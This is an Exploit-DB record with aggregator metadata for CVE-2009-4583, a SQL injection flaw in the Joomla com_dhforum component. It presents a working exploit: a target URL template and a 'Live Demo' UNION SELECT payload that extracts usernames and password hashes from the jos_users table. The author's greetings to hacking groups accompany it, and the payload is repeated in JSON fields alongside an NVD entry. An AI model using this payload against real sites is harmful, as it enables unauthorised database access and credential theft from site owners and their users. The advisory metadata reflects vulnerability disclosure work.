ID EDB-ID:10742
Type exploitdb
Reporter ViRuSMaN
Modified 2009-12-27T00:00:00
Description
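SQL injection vulnerability in the Joomla! component com_dhforum (DhForum), CVE-2009-4583: remote attackers can execute arbitrary SQL commands via the id parameter of the grouplist view in index.php. Webapps exploit for the PHP platform.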
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
======
[»] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================
======
[»] Script: [ joomla Component ]
[»] Language: [ PHP ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]
===[ Live Demo ]===
[»] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat
(username,0x3a,password)+from+jos_users--
Author: ViRuSMaN <-
###########################################################################
{"bulletinFamily": "exploit", "id": "EDB-ID:10742", "cvelist": ["CVE-2009-4583"], "modified": "2009-12-27T00:00:00", "lastseen": "2016-02-01T13:06:10", "edition": 1, "sourceData": "==============================================================================\r\n_ _ _ _ _ _\r\n/ \\ | | | | / \\ | | | |\r\n/ _ \\ | | | | / _ \\ | |_| |\r\n/ ___ \\ | |___ | |___ / ___ \\ | _ |\r\nIN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\r\n\r\n\r\n==============================================================================\r\n======\r\n[\u00bb] Joomla Component com_dhforum SQL Injection Vulnerability\r\n========================================================================\r\n\r\n======\r\n\r\n[\u00bb] Script: [ joomla Component ]\r\n[\u00bb] Language: [ PHP ]\r\n[\u00bb] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]\r\n[\u00bb] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]\r\n[\u00bb] My Home: [ HackTeach.Org , Islam-Attack.Com ]\r\n\r\n###########################################################################\r\n\r\n===[ Exploit ]===\r\n\r\n[\u00bb] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]\r\n\r\n\r\n\r\n===[ Live Demo ]===\r\n\r\n[\u00bb] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat\r\n\r\n(username,0x3a,password)+from+jos_users--\r\n\r\nAuthor: ViRuSMaN <-\r\n\r\n###########################################################################", "published": "2009-12-27T00:00:00", "href": "https://www.exploit-db.com/exploits/10742/", "osvdbidlist": ["61565"], "reporter": "ViRuSMaN ", "hash": "83becfff418db263bb16e112c3f9e53d499fc59a21f327b6532509a313bf4306", "title": "Joomla Component com_dhforum SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Joomla Component com_dhforum SQL Injection Vulnerability. CVE-2009-4583. 
Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10742/", "enchantments": {"vulnersScore": 3.5}}
{"result": {"cve": [{"id": "CVE-2009-4583", "type": "cve", "title": "CVE-2009-4583", "description": "SQL injection vulnerability in the DhForum (com_dhforum) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a grouplist action to index.php.", "published": "2010-01-06T17:00:11", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4583", "cvelist": ["CVE-2009-4583"], "lastseen": "2017-08-17T11:14:35"}]}}